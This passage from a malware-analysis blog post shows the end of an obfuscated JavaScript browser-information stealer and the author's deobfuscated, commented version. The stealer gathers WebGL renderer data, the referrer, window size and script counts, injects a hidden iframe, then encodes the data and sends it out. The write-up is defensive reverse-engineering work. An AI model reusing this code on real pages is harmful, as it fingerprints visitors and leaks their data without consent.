_$_b5e6[32], _$_b5e6[33]]; var iujyj = [_$_b5e6[34], _$_b5e6[35]]; var ii = 4; while (ii--) { if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_56_50()(); jso$spliter_$af5097() } else { try { if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_55_55()(); jso$spliter_$af5098() }; qpjoj = ewjqj[_$_b5e6[36]](rujcj = trjej[ii]); if (qpjoj && jso$ft$uoel$_33((1 && lkjej._)(qpjoj[_$_b5e6[37]])) && jso$ft$boe$_61_61(_$_b5e6[38], qpjoj[_$_b5e6[37]])) { if ((1 && lkjej._)(qpjoj[_$_b5e6[39]])) { return }; if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_55_55()(); jso$spliter_$af5099(); return } else { if ((1 && lkjej._)(qpjoj[_$_b5e6[40]])) { return } }; var rndjo = qpjoj[_$_b5e6[37]](qpjoj[_$_b5e6[40]](_$_b5e6[42])[_$_b5e6[41]]); var reredjej = qpjoj[_$_b5e6[37]](qpjoj[_$_b5e6[40]](_$_b5e6[42])[_$_b5e6[43]]); return jso$ft$boe$_33_61_61(qpjoj[_$_b5e6[39]]()[_$_b5e6[44]](_$_b5e6[42]), -1) ? jso$ft$boe$_43(rndjo + _$_b5e6[45], reredjej) : _$_b5e6[46] } } catch (e) {} } }; return iujyj[0] }; return iujyj[1] } } mljpj = {}; wef = {}; var _$_b5e6 = (_$af5082)("uOR%dee%n%entK%srddonmrieEslt%Pteor%E%fsnddtBgteAettFosiii%ntrHnn%wnginnsmrnRsnWle%naRreepftt%i%0egulbelyue%crotate%-%MraaoSeEnc%CRItrt%ptdl%rg%toeaseOr__eawwtsoilMmI%e_%ArrteelacMg%dp%sotE%NahyrayttBfGppoyucsrb%%iepBrarlcr%uterle_BefwyainCsSw %eiPp3NbepteloDkk%mx_erWree%Un-dDf%icet2_tyec%%n%ee%ded_sieEDn%%r%hLfebintoERoLttp%oetpot%MWj%trniUesDb_nti%dnWtiGnt-]t%%gLtxSbdEieinsgeOfwtcod0ylxssoeTante%ndWesbGSRgnStree%eeniiirEtu%weehdgoncNe%%rMvNSw GnLobgaKEeaooepwnLngkaonR_lETen VcHaeTd dmp%tseeepeprelzNo%vnestrDge.ul_lw woa%ndg%Ep%liteE%et%tj%LDd_wouenEe-bwsep%bhoCoopexiC%%AEGgg%mglbnttuKotdxet%bt_0ieorsefe%nux__G[NS_rpm%a%V%Wcpd", 6140204); if (!_$af5077) { _$af5082(); _$af5085(); } else {}; !_$af5077(); function jso$spliter_$af5086(b, i, z) { i._[b._] = i._[z._] } function jso$spliter_$af5087(z, i, n) { i._[z._] = n._ } function jso$spliter_$af5088(e, w, g) { e._ = jso$ft$boe$_37((jso$ft$boe$_43(w._, g._)), 6286363) } function jso$spliter_$af5089() { jso$ft$giden$mljpj()[_$_b5e6[5]] = 0 } function jso$spliter_$af5090() { jso$ft$giden$mljpj()[_$_b5e6[7]] = jso$ft$giden$document()[_$_b5e6[8]] } function jso$spliter_$af5091() { jso$ft$giden$mljpj()[_$_b5e6[9]] = jso$ft$giden$window()[_$_b5e6[10]] } function jso$spliter_$af5092() { _$af5077 = null } function jso$spliter_$af5093() { jso$ft$giden$mljpj()[_$_b5e6[11]] = jso$ft$giden$window()[_$_b5e6[12]] } function jso$spliter_$af5096() { _$af5077 = 1 } function jso$spliter_$af5100(iiop) { iiop._[_$_b5e6[49]][_$_b5e6[48]] = _$_b5e6[50] } function jso$spliter_$af5101(jbt, _c, ja) { if (jso$ft$boe$_61_61(jbt._, 0)) { _c._ = ja._; _c._[_$_b5e6[56]][_$_b5e6[55]] = [] } } function jso$spliter_$af5102(_c, ja) { _c._[_$_b5e6[56]][_$_b5e6[55]][_c._[_$_b5e6[56]][_$_b5e6[55]][_$_b5e6[16]]] = ja._ } function jso$spliter_$af5103() { _$af5082 = null } function jso$spliter_$af5104() { _$af5077 = 0 } function jso$spliter_$af5105() { if (jso$ft$uoel$_33(_$af5082)) { _$af5077 = false } } function jso$spliter_$af5106(aca) { aca._++ } function jso$spliter_$af5094() { mljpj[_$_b5e6[5]]++ } function jso$spliter_$af5095() { jso$ft$giden$wef()[_$_b5e6[4]] = true } function jso$spliter_$af5097() { _$af5077 = 0 } function jso$spliter_$af5098() { _$af5082 = 1 } function jso$spliter_$af5099() { _$af5082 = null }'
    )(3597)
}();

Cleaning

At this point, I began cleaning the obfuscated string (say, X) that is the second argument of P() call. The value 3597 is an argument to X and there is no other use for function W() and variable, P. So, I’ve removed that code from the final cleaned version. Also, in order to make the code more readable and intuitive, I initialized the following variables based on their usage in the script:

globalVar1 = 0
mljpj = {'cid': 0}
wef = {}
globalVar2 = 1
/*
Purpose: Browser information stealer
Tactic: 
    1. Retrieves the following information:
        a. browser vendor (Ex: Google, Inc) and graphics renderer (Ex: Intel HD Graphics 630 Direct3D11 vs_5_0 ps_5_0)
        b. referrer webpage
        c. browser width and height
        d. number of script tags in the webpage
        e. changes made to the webpage's DOM tree
    2. Injects an invisible IFrame and counts something that I have not been able to figure out
    3. Encodes the gathered information and sends it (to a remote destination perhaps)
*/

function() {
    function function3(doesprototypeExistFunc) {
        return function() {
            var errors = ['Supported. Disabled', 'WebGL not supported'];
			
            // Determining graphics rendering interface
            if (WebGLRenderingContext) {
                var canvasContext;
                var index = 4;
                var canvasNode = document.createElement('canvas');
                var webglContext = ['webkit-3d', 'moz-webgl', 'experimental-webgl', 'webgl'];

                while (index--) {
                    try {
                        canvasContext = canvasNode['getContext'](webglContext[index]);
						
                        if (canvasContext && !(doesprototypeExistFunc)(canvasContext['getParameter']) && (canvasContext['getParameter'] == 'function')) {
                            // Get vendor string (Ex: Google Inc.)
                            var vendorString = canvasContext['getParameter'](canvasContext['getExtension']('WEBGL_debug_renderer_info')['UNMASKED_VENDOR_WEBGL']);
                            // Get renderer string (Ex: Intel HD Graphics 630 Direct3D11 vs_5_0 ps_5_0)
                            var rendererString = canvasContext['getParameter'](canvasContext['getExtension']('WEBGL_debug_renderer_info')['UNMASKED_RENDERER_WEBGL']);
							
                            // If 'WEBGL_debug_renderer_info' extension supported, return concatenated vendor and renderer string
                            return (canvasContext['getSupportedExtensions']()['indexOf']('WEBGL_debug_renderer_info') !== -1) ? (vendorString + ' ' + rendererString) : '';
                        }
                    } catch (e) {}
                }

                // If graphics rendering is supported but is disabled
                return errors[0];
            }

            // If graphics rendering is unsupported
            return errors[1];
        }
    }
	
    // Not sure what this function counts, but it may have something to do with the created IFrame's properties
    function function1() {
        return function(iframeWindow, num) {
            var tempIframeWindow, obj4 = {};
        
            tempIframeWindow = iframeWindow;

            //tempIframeWindow.Node.data = [];
            //tempIframeWindow.Node.data[tempIframeWindow.Node.data.length] = iframeWindow;
			
            obj4 = 0;
			
            var iframeObj = document.domApisArray[iframeWindow]
		
            if ((iframeObj == 'object') || (iframeObj == 'function') &&
                (iframeWindow != null) && (iframeWindow != tempIframeWindow.parent) && (iframeWindow != tempIframeWindow.top) && (iframeWindow != tempIframeWindow.opener)) {
                for (var iframeWindowProps of Reflect.ownKeys(iframeWindow)) {
                    try {
                        if ((iframeWindowProps == 'all') ||
                            ((typeof(iframeWindow['__lookupGetter__']) == 'function') && (typeof(iframeWindow['__lookupGetter__'](iframeWindowProps)) == 'function')) ||
                            ((typeof(iframeWindow['__lookupSetter__']) == 'function') && (typeof(iframeWindow['__lookupSetter__'](iframeWindowProps)) == 'function'))) {
                            obj4++;
                        } else {
                            if ((iframeObj == 'object')) {
                                if (num < 30) {
                                    obj4 += (tempIframeWindow)(iframeWindow[iframeWindowProps], (num + 1), tempIframeWindow);
                                }
                            } else if ((iframeObj == 'function')) {
                                var zrz = escape(iframeWindow[iframeWindowProps])['length'];

                                if (zrz != 2) {
                                    obj4 += escape(iframeWindow[iframeWindowProps])['length'];
                                }

                                if (num < 30) {
                                    obj4 += (tempIframeWindow)(iframeWindow[iframeWindowProps]['prototype'], (num + 1), tempIframeWindow);
                                }
                            }
                        }
                    } catch (e) {};
                }

                obj4++;
            }
        }
		
        return obj4;
    }
	
    function function2() {
        var iframeElement;
		
        // Checks if elementX object has a prototype property. If so, set wef['t'] = true and return true else return false
        doesprototypeExistFunc = function(elementX) { if('prototype' in elementX) { wef['t'] = true; return true } else return false; }
		
        // Returns browser vendor and graphics renderer (Ex: Intel HD Graphics 630 Direct3D11 vs_5_0 ps_5_0)
        webGLString = function3(doesprototypeExistFunc);
        mljpj.wsg = (webGLString)();

        // Not sure what this represents
        window.wef = {'c': 2000 + mljpj.cid, 't': false};

        // Returns the web page URL which led to the current page
        mljpj.dsr = document.referrer;
        // Width of browser window in pixels
        mljpj.wsi = window.innerWidth;	
        // Height of browser window in pixels
        mljpj.wst = window.innerHeight;
        // Not sure what this represents (Ex: 62-56)
        mljpj['wsc'] = escape(Node.prototype.appendChild).length + '-' + escape(document.write).length;
        // Counts number of script tags in current webpage
        mljpj.psn = document.getElementsByTagName('SCRIPT').length;

        // Replaces instances of MutationObserver in the webpage source code with the function
        // Counts changes to the webpage
        mljpj.est = 0;
        document.all[0].innerHTML.replace(/MutationObserver/g, function(m, n) { mljpj.est++; return 'MutationObserver'; });

        try {
            // Create an invisible IFrame and append it to the DOM tree
            iframeElement = document.createElement("iframe");
            iframeElement.style.display = 'none';
            document.body.appendChild(iframeElement);
			
            // Not sure what below function counts
            mljpj.wsf = (function1())(iframeElement.contentDocument.defaultView, 0);
        } catch (e) {};

        // Convert mljpj JS object to a string, base64 encode it and URL encodes it twice
        wef.d = escape(escape(btoa(JSON.stringify(mljpj))));
        // Convert wef JS object to a string and send it, to a remote server perhaps
        jbj.send(JSON.stringify(wef));
    }
	
    function permuteStringRetArray(stringArg, num) {
        var ch, index1, index2, temp, tempX, tempY, tempNum, stringArgArray;
        var stringArgLen;

        tempNum = num;
        stringArgArray = [];
        stringArgLen = stringArg.length;

        // Create array containing stringArg characters
        for (var f = 0; f < stringArgLen; f++) {
            stringArgArray[f] = stringArg.charAt(f);
        }

        for (var f = 0; f < stringArgLen; f++) {
            // Determine indices at which values will be swapped
            tempX = tempNum * (f + 447) + (tempNum % 50266);
            tempY = tempNum * (f + 203) + (tempNum % 53635);
            index1 = tempX % stringArgLen;
            index2 = tempY % stringArgLen;

            // Swap values at indices
            temp = stringArgArray[index1];
            stringArgArray[index1] = stringArgArray[index2];
            stringArgArray[index2] = temp;

            tempNum = (tempX + tempY) % 6286363;
        }
	
        ch = String.fromCharCode(127);
		
        // Return array containing DOM APIs
        return stringArgArray.join("").split("%").join(ch).split("#1").join("%").split("#0").join("#").split(ch);
    }
	
    globalVar1 = 0
    mljpj = {'cid': 0}
    wef = {}
    globalVar2 = 1
	
    /*
        Get an array containing DOM APIs:
        ["wef", "c", "2000", "cid", "t", "est", "wsg", "dsr", "referrer", "wsi", "innerWidth", "wst", "innerHeight", "innerHTML", "all", "wsc", "length", "appendChild", "prototype", "-", "write", "psn", "SCRIPT", "getElementsByTagName", "MutationObserver", "replace", "toString", "[object WebGLRenderingContext]", "createElement", "canvas", "webkit-3d", "moz-webgl", "experimental-webgl", "webgl", "Supported. Disabled", "WebGL not supported", "getContext", "getParameter", "function", "getSupportedExtensions", "getExtension", "UNMASKED_VENDOR_WEBGL", "WEBGL_debug_renderer_info", "UNMASKED_RENDERER_WEBGL", "indexOf", " ", "", "IFRAME", "display", "style", "none", "body", "wsf", "defaultView", "contentDocument", "data", "Node", "object", "parent", "top", "opener", "ownKeys", "__lookupGetter__", "__lookupSetter__", "d", "stringify", "send"]
    */

    var domApisArray = (permuteStringRetArray)("uOR%dee%n%entK%srddonmrieEslt%Pteor%E%fsnddtBgteAettFosiii%ntrHnn%wnginnsmrnRsnWle%naRreepftt%i%0egulbelyue%crotate%-%MraaoSeEnc%CRItrt%ptdl%rg%toeaseOr__eawwtsoilMmI%e_%ArrteelacMg%dp%sotE%NahyrayttBfGppoyucsrb%%iepBrarlcr%uterle_BefwyainCsSw %eiPp3NbepteloDkk%mx_erWree%Un-dDf%icet2_tyec%%n%ee%ded_sieEDn%%r%hLfebintoERoLttp%oetpot%MWj%trniUesDb_nti%dnWtiGnt-]t%%gLtxSbdEieinsgeOfwtcod0ylxssoeTante%ndWesbGSRgnStree%eeniiirEtu%weehdgoncNe%%rMvNSw GnLobgaKEeaooepwnLngkaonR_lETen VcHaeTd dmp%tseeepeprelzNo%vnestrDge.ul_lw woa%ndg%Ep%liteE%et%tj%LDd_wouenEe-bwsep%bhoCoopexiC%%AEGgg%mglbnttuKotdxet%bt_0ieorsefe%nux__G[NS_rpm%a%V%Wcpd", 6140204);

    !function2();
}();

Thanks for reading!

In this article, I described my procedure to deobfuscate an obfuscated JS string. Personally, the highlight of this deobfuscation procedure was to recognize that the string after the first round of base64 decoding was salted with redundant characters. This JS code could be injected into web pages or delivered through malicious ads in order to steal user browser information.

Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!

Leave a Reply

Your email address will not be published.